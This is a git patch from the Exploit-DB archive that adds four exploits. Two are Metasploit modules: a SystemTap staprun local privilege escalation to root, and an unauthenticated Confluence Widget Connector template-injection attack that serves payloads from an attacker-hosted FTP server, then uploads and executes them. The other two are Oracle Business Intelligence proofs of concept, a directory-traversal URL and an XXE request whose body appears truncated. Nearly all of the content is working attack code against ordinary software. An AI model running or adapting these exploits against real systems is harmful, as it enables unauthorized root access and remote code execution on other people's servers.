From aaf10d856640906daa7be039773691d14d8269bc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 20 Apr 2019 05:01:59 +0000 Subject: [PATCH] DB: 2019-04-20 4 changes to exploits/shellcodes SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit) Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit) Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection --- exploits/linux/local/46730.rb | 142 +++++++++ exploits/multiple/remote/46731.rb | 465 +++++++++++++++++++++++++++++ exploits/windows/webapps/46728.txt | 13 + exploits/windows/webapps/46729.txt | 22 ++ files_exploits.csv | 4 + 5 files changed, 646 insertions(+) create mode 100755 exploits/linux/local/46730.rb create mode 100755 exploits/multiple/remote/46731.rb create mode 100644 exploits/windows/webapps/46728.txt create mode 100644 exploits/windows/webapps/46729.txt diff --git a/exploits/linux/local/46730.rb b/exploits/linux/local/46730.rb new file mode 100755 index 000000000..b58d7b0dc --- /dev/null +++ b/exploits/linux/local/46730.rb @@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by exploiting a + vulnerability in the `staprun` executable included with SystemTap + version 1.3. + + The `staprun` executable does not clear environment variables prior to + executing `modprobe`, allowing an arbitrary configuration file to be + specified in the `MODPROBE_OPTIONS` environment variable, resulting + in arbitrary command execution with root privileges. + + This module has been tested successfully on: + + systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and + systemtap 1.1-3.el5 on RHEL 5.5 (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tavis Ormandy', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2010-11-17', + 'References' => + [ + ['BID', '44914'], + ['CVE', '2010-4170'], + ['EDB', '15620'], + ['URL', 'https://securitytracker.com/id?1024754'], + ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'], + ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'], + ['URL', 'https://bugs.launchpad.net/bugs/677226'], + ['URL', 'https://www.debian.org/security/2011/dsa-2348'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultTarget' => 0)) + register_options [ + OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun']) + ] + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def staprun_path + datastore['STAPRUN_PATH'] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def check + # On some systems, staprun execution is restricted to stapusr group: + # ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun + unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true' + vprint_error "#{staprun_path} is not executable" + return CheckCode::Safe + end + vprint_good "#{staprun_path} is executable" + + unless setuid? staprun_path + vprint_error "#{staprun_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{staprun_path} is setuid" + + CheckCode::Detected + end + + def exploit + unless check == CheckCode::Detected + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + config_path = "#{base_dir}/#{payload_name}.conf" + upload config_path, "install uprobes /bin/sh" + + print_status 'Executing payload...' + res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}" + vprint_line res + end +end \ No newline at end of file diff --git a/exploits/multiple/remote/46731.rb b/exploits/multiple/remote/46731.rb new file mode 100755 index 000000000..3c68146c1 --- /dev/null +++ b/exploits/multiple/remote/46731.rb @@ -0,0 +1,465 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::FtpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection", + 'Description' => %q{ + Widget Connector Macro is part of Atlassian Confluence Server and Data Center that + allows embed online videos, slideshows, photostreams and more directly into page. + A _template parameter can be used to inject remote Java code into a Velocity template, + and gain code execution. Authentication is unrequired to exploit this vulnerability. + By default, Java payload will be used because it is cross-platform, but you can also + specify which native payload you want (Linux or Windows). + + Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version + 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. + + This vulnerability was originally discovered by Daniil Dmitriev + https://twitter.com/ddv_ua. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniil Dmitriev', # Discovering vulnerability + 'Dmitry (rrock) Shchannikov' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2019-3396' ], + [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ], + [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'], + [ 'URL', 'https://paper.seebug.org/886/'] + ], + 'Targets' => + [ + [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], + [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], + [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] + ], + 'DefaultOptions' => + { + 'RPORT' => 8090, + 'SRVPORT' => 8021, + }, + 'Privileged' => false, + 'DisclosureDate' => 'Mar 25 2019', + 'DefaultTarget' => 0, + 'Stance' => Msf::Exploit::Stance::Aggressive + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base to Confluence', '/']), + OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability', + 'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) + ]) + end + + # Handles ftp RETP command. + # + # @param c [Socket] Control connection socket. + # @param arg [String] RETR argument. + # @return [void] + def on_client_command_retr(c, arg) + vprint_status("FTP download request for #{arg}") + conn = establish_data_connection(c) + if(not conn) + c.put("425 Can't build data connection\r\n") + return + end + + c.put("150 Opening BINARY mode data connection for #{arg}\r\n") + case arg + when /check\.vm$/ + conn.put(wrap(get_check_vm)) + when /javaprop\.vm$/ + conn.put(wrap(get_javaprop_vm)) + when /upload\.vm$/ + conn.put(wrap(get_upload_vm)) + when /exec\.vm$/ + conn.put(wrap(get_exec_vm)) + else + conn.put(wrap(get_dummy_vm)) + end + c.put("226 Transfer complete.\r\n") + conn.close + end + + # Handles ftp PASS command to suppress output. + # + # @param c [Socket] Control connection socket. + # @param arg [String] PASS argument. + # @return [void] + def on_client_command_pass(c, arg) + @state[c][:pass] = arg + vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}") + c.put "230 Login OK\r\n" + end + + # Handles ftp EPSV command to suppress output. + # + # @param c [Socket] Control connection socket. + # @param arg [String] EPSV argument. + # @return [void] + def on_client_command_epsv(c, arg) + vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'") + c.put("500 'EPSV #{arg}': command not understood.\r\n") + end + + # Returns a upload template. + # + # @return [String] + def get_upload_vm + ( + <<~EOF + $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}')) + EOF + ) + end + + # Returns a command execution template. + # + # @return [String] + def get_exec_vm + ( + <<~EOF + $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor() + EOF + ) + end + + # Returns checking template. + # + # @return [String] + def get_check_vm + ( + <<~EOF + #{@check_text} + EOF + ) + end + + # Returns Java's getting property template. + # + # @return [String] + def get_javaprop_vm + ( + <<~EOF + $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString() + EOF + ) + end + + # Returns dummy template. + # + # @return [String] + def get_dummy_vm + ( + <<~EOF + EOF + ) + end + + # Checks the vulnerability. + # + # @return [Array] Check code + def check + checkcode = Exploit::CheckCode::Safe + begin + # Start the FTP service + print_status("Starting the FTP server.") + start_service + + @check_text = Rex::Text.rand_text_alpha(5..10) + res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm") + if res && res.body && res.body.include?(@check_text) + checkcode = Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + checkcode = Exploit::CheckCode::Unknown + end + checkcode + end + + # Injects Java code to the template. + # + # @param service_url [String] Address of template to injection. + # @return [void] + def inject_template(service_url, timeout=20) + + uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'headers' => { + 'Accept' => '*/*', + 'Origin' => full_uri(vhost_uri: true) + }, + 'ctype' => 'application/json; charset=UTF-8', + 'data' => { + 'contentId' => '1', + 'macro' => { + 'name' => 'widget', + 'body' => '', + 'params' => { + 'url' => datastore['TRIGGERURL'], + '_template' => service_url + } + + } + }.to_json + }, timeout=timeout) + + unless res + unless service_url.include?("exec.vm") + print_warning('Connection timed out in #inject_template') + end + return + end + + if res.body.include? 'widget-error' + print_error('Failed to inject and execute code:') + else + vprint_status("Server response:") + end + + vprint_line(res.body) + + res + end + + # Returns a system property for Java. + # + # @param prop [String] Name of the property to retrieve. + # @return [String] + def get_java_property(prop) + @prop = prop + res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm") + if res && res.body + return clear_response(res.body) + end + '' + end + + # Returns the target platform. + # + # @return [String] + def get_target_platform + return get_java_property('os.name') + end + + # Checks if the target os/platform is compatible with the module target or not. + # + # @return [TrueClass] Compatible + # @return [FalseClass] Not compatible + def target_platform_compat?(target_platform) + target.platform.names.each do |n| + if n.downcase == 'java' || target_platform.downcase.include?(n.downcase) + return true + end + end + + false + end + + # Returns a temp path from the remote target. + # + # @return [String] + def get_tmp_path + return get_java_property('java.io.tmpdir') + end + + # Returns the Java home path used by Confluence. + # + # @return [String] + def get_java_home_path + return get_java_property('java.home') + end + + # Returns Java code that can be used to inject to the template in order to copy a file. + # + # @note The purpose of this method is to have a file that is not busy, so we can execute it. + # It is meant to be used with #get_write_file_code. + # + # @param fname [String] The file to copy + # @param new_fname [String] The new file + # @return [void] + def get_dup_file_code(fname, new_fname) + if fname =~ /^\/[[:print:]]+/ + @command = "cp #{fname} #{new_fname}" + else + @command = "cmd.exe /C copy #{fname} #{new_fname}" + end + + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm") + end + + # Returns the normalized file path for payload. + # + # @return [String] + def normalize_payload_fname(tmp_path, fname) + # A quick way to check platform insteaf of actually grabbing os.name in Java system properties. + if /^\/[[:print:]]+/ === tmp_path + Rex::FileUtils.normalize_unix_path(tmp_path, fname) + else + Rex::FileUtils.normalize_win_path(tmp_path, fname) + end + end + + # Exploits the target in Java platform. + # + # @return [void] + def exploit_as_java + + tmp_path = get_tmp_path + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") + @b64 = Rex::Text.encode_base64(payload.encoded_jar) + @command = '' + + java_home = get_java_home_path + + if java_home.blank? + fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') + else + vprint_status("Found Java home path: #{java_home}") + end + + register_files_for_cleanup(@fname) + + if /^\/[[:print:]]+/ === @fname + normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java') + @command = %Q|#{normalized_java_path} -jar #{@fname}| + else + normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe') + @fname.gsub!(/Program Files/, 'PROGRA~1') + @command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}| + end + + print_status("Attempting to upload #{@fname}") + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") + + print_status("Attempting to execute #{@fname}") + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) + end + + + # Exploits the target in Windows platform. + # + # @return [void] + def exploit_as_windows + tmp_path = get_tmp_path + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) + @fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") + @fname.gsub!(/Program Files/, 'PROGRA~1') + new_fname.gsub!(/Program Files/, 'PROGRA~1') + register_files_for_cleanup(@fname, new_fname) + + print_status("Attempting to upload #{@fname}") + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") + + print_status("Attempting to copy payload to #{new_fname}") + get_dup_file_code(@fname, new_fname) + + print_status("Attempting to execute #{new_fname}") + @command = new_fname + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) + end + + + # Exploits the target in Linux platform. + # + # @return [void] + def exploit_as_linux + tmp_path = get_tmp_path + + if tmp_path.blank? + fail_with(Failure::Unknown, 'Unable to get the temp path.') + end + + @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) + @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) + new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) + register_files_for_cleanup(@fname, new_fname) + + print_status("Attempting to upload #{@fname}") + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm") + + @command = "chmod +x #{@fname}" + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm") + + print_status("Attempting to copy payload to #{new_fname}") + get_dup_file_code(@fname, new_fname) + + print_status("Attempting to execute #{new_fname}") + @command = new_fname + inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5) + end + + def exploit + @wrap_marker = Rex::Text.rand_text_alpha(5..10) + + # Start the FTP service + print_status("Starting the FTP server.") + start_service + + target_platform = get_target_platform + if target_platform.nil? + fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run "check".') + else + print_status("Target being detected as: #{target_platform}") + end + + unless target_platform_compat?(target_platform) + fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') + end + + case target.name.downcase + when /java$/ + exploit_as_java + when /windows$/ + exploit_as_windows + when /linux$/ + exploit_as_linux + end + end + + # Wraps request. + # + # @return [String] + def wrap(string) + "#{@wrap_marker}\n#{string}#{@wrap_marker}\n" + end + + # Returns unwrapped response. + # + # @return [String] + def clear_response(string) + if match = string.match(/#{@wrap_marker}\n(.*)\n#{@wrap_marker}\n/m) + return match.captures[0] + end + end +end \ No newline at end of file diff --git a/exploits/windows/webapps/46728.txt b/exploits/windows/webapps/46728.txt new file mode 100644 index 000000000..45e62a085 --- /dev/null +++ b/exploits/windows/webapps/46728.txt @@ -0,0 +1,13 @@ +# Exploit Title: Directory traversal in Oracle Business Intelligence +# Date: 16.04.19 +# Exploit Author: @vah_13 +# Vendor Homepage: http://oracle.com +# Software Link: +https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html +# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0 +# Tested on: Windows +# CVE : CVE-2019-2588 + +PoC + +http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini \ No newline at end of file diff --git a/exploits/windows/webapps/46729.txt b/exploits/windows/webapps/46729.txt new file mode 100644 index 000000000..a24557ee9 --- /dev/null +++ b/exploits/windows/webapps/46729.txt @@ -0,0 +1,22 @@ +# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher +# Date: 16.04.19 +# Exploit Author: @vah_13 +# Vendor Homepage: http://oracle.com +# Software Link: +https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html +# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0 +# Tested on: Windows +# CVE : CVE-2019-2616 (7.2/10) + +PoC: + +POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 +Host: host +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 +Firefox/62.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Content-Length: 76 +Content-Type: text/xml; charset=UTF-8 + + +"> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3e83dcf72..ac809f009 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10428,6 +10428,7 @@ id,file,description,date,author,type,platform,port 46717,exploits/windows/local/46717.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation",2019-04-16,"Google Security Research",local,windows, 46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows, 46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple, +46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17344,6 +17345,7 @@ id,file,description,date,author,type,platform,port 46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware, 46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110 46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows, +46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41162,3 +41164,5 @@ id,file,description,date,author,type,platform,port 46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php, 46706,exploits/hardware/webapps/46706.txt,"Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting",2019-04-16,"Aaron Bishop",webapps,hardware,80 46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80 +46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows, +46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,